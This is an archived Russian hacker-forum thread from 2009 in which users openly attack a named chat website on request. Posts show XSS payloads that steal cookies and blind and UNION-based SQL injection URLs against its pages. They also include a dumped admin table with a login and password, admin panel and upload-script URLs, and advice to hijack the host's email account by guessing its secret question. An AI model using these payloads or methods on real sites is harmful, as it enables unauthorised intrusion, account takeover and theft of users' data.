Помогите сломать чат [Архив]

Angel_Of_Trance

25.11.2009, 17:13

http://waufon.ru/serv/index.php?ci=427

FALTONICK

25.11.2009, 18:32

забанили?

Lilo

25.11.2009, 18:32

http://waufon.ru/serv/index.php?ci=427
пиши хостеру узнавай мыло
подбирай секретный вопрос и вауля готово

Aikaram

25.11.2009, 18:40

Ок. Сломал. Что дальше?

Godfather Bulan

25.11.2009, 18:41

theSummaries[0] = "Бот> Привет ну наконецто ктото притопал..";
theSiteLinks[0] = "#";

theSummaries[1] = "Бот> Я научу Вас пользоватсо чатом если вы новичёк.";
theSiteLinks[1] = "#";

theSummaries[2] = "Бот> Если вы здесь впервые то надо Зарегистрироватсо.";
theSiteLinks[2] = "#";

theSummaries[3] = "Бот> Придумай сибе пароль и логин.";
theSiteLinks[3] = "#";

theSummaries[4] = "Бот> Выш пароль и логин здесь будет служить вам постоянным пропуском в ваш личный аккаунт.";
theSiteLinks[4] = "#";

theSummaries[5] = "Бот> Когда зайдёш в чатик то в Личном кабинете настрой его под свой носитель.";
theSiteLinks[5] = "#";

theSummaries[6] = "Бот> Количество сообщений,время обновления,Эмоцыи,Цвет сообщения,Выделения,и многие навороты";
theSiteLinks[6] = "#";

theSummaries[7] = "Бот> Я буду рад если вы качнёте свою фотку..";
theSiteLinks[7] = "#";

theSummaries[8] = "Бот> В анкете укажите свой Пол и год рождения,настрой и контакты свои.";
theSiteLinks[8] = "#";

theSummaries[9] = "Бот> У вас будет асортимент цветосхем в чате,У каждого сваё графити.";
theSiteLinks[9] = "#";

theSummaries[10] = "Бот> Смайлики найдёте в разделе Помощь";
theSiteLinks[10] = "#";

theSummaries[11] = "Бот> Админов ненадо доставать с просьбами дать должность.Я сам тут даю должностя.Набирайте посты и покупайте должностя.";
theSiteLinks[11] = "#";

theSummaries[12] = "Бот> Внимание! В чате есть магазин где продаютсо аваторы и разные фиговинки.";
theSiteLinks[12] = "#";

theSummaries[13] = "Бот> Прошу об одном.Ненагнетайте обстановку в чате.";
theSiteLinks[13] = "#";

theSummaries[14] = "Бот> Приводите друзей к нам мы будем вам признательны";
theSiteLinks[14] = "#";

theSummaries[15] = "Бот> Пока-пока...";
theSiteLinks[15] = "#";

У админа грамматика на высоте!

Ponchik

25.11.2009, 18:49

http://waufon.ru/serv/index.php?ci=427"><script>alert(document.cookie)</script>
А вот тут вкуснее
http://waufon.ru/serv/my/parole.php?ci=427&id=4589&pass=antichat&url="><script>alert()</script>
пасс хранится в поле pass можем смело отсылать на сниффер, токо для каждого юзверя нужен свой ID :(
P.S. А в куках он ничё не хранит
P.P.S. А мля он пасс через URL передаёт, ну тогда хз :o
P.P.P.S: Зарегал antichat:antichat

НЯ!
http://waufon.ru/serv/galery.php?id=4589&pass=antichat&url=&ref=81339&ci=427+AND+1=1--
http://waufon.ru/serv/galery.php?id=4589&pass=antichat&url=&ref=81339&ci=427+AND+1=2--
Версия 5.1.35-log

Chack.

25.11.2009, 18:58

http://waufon.ru/serv/index.php?ci=427"><script>alert(document.cookie)</script>
А вот тут вкуснее
http://waufon.ru/serv/my/parole.php?ci=427&id=4589&pass=antichat&url="><script>alert()</script>
пасс хранится в поле pass можем смело отсылать на сниффер, токо для каждого юзверя нужен свой ID :(
P.S. А в куках он ничё не хранит
P.P.S. А мля он пасс через URL передаёт, ну тогда хз :o
P.P.P.S: Зарегал antichat:antichat

НЯ!
http://waufon.ru/serv/galery.php?id=4589&pass=antichat&url=&ref=81339&ci=427+AND+1=1--
http://waufon.ru/serv/galery.php?id=4589&pass=antichat&url=&ref=81339&ci=427+AND+1=2--

Ты мой кумир :(

Ponchik

25.11.2009, 19:00

Ты мой кумир :(
Я хакер? :(
======
БД waufon_servak
пойду таблы таскать
И да, можно поискать не слепую скулю, но мне так интереснее :)

Chack.

25.11.2009, 19:03

Я хакер? :(
======
БД waufon_servak
пойду таблы таскать
И да, можно поискать не слепую скулю, но мне так интереснее :)

Ты мой любимый пончик :(

-Unlocked-

25.11.2009, 19:10

Пончик, ты хакер. :(
Только ТСу надо было пасс админа, а потом похвастаться перед одноклассницами. =(

Ponchik

25.11.2009, 19:14

А чо, первая табла там "adminka"
Щас потискаю её
adminka (name,passer,reklama,limit)
name:passer
KoT:servise

Токо куда это писать я хз :o

Ded MustD!e

25.11.2009, 19:25

http://waufon.ru/serv/vrat.php?ci=-316+union+select+1,concat_ws(0x3a,user(),version() ,database())--

первая же ссылка которая попалась, чтоб не мучаться со слепой.

Keltos

25.11.2009, 19:27

http://waufon.ru/serv/vrat.php?ci=-316+union+select+1,concat_ws(0x3a,user(),version() ,database())--

первая же ссылка которая попалась, чтоб не мучаться со слепой.
вот он хекер

Ponchik

25.11.2009, 19:29

/me заплакал и убежал

aka_zver

25.11.2009, 19:32

Ded MustD!e, ты обидел Пончика :(

banana

25.11.2009, 19:32

Плахая утка :(

root_sashok

25.11.2009, 19:45

Сущность Античата еще жива - ломать чаты ;)

GenTao

25.11.2009, 22:11

Оказывается,я раньше всех...а разница-то ?

Adm1n4eG

25.11.2009, 22:32

парочка админок
http://waufon.ru/Gomel/admin/
http://waufon.ru/Gomel/admini/
и парочка интересных скриптов
http://waufon.ru/php/?get_scripts=upload

Gen1rus

25.11.2009, 23:01

Adm1n4eG, пароль то с логином дай, я так тоже умею.

Adm1n4eG

25.11.2009, 23:05

Gen1rus держи тут сразу root )))))))))
http://waufon.ru/php/forms/form.html

LiteMentaL

26.11.2009, 00:02

херня а не чат...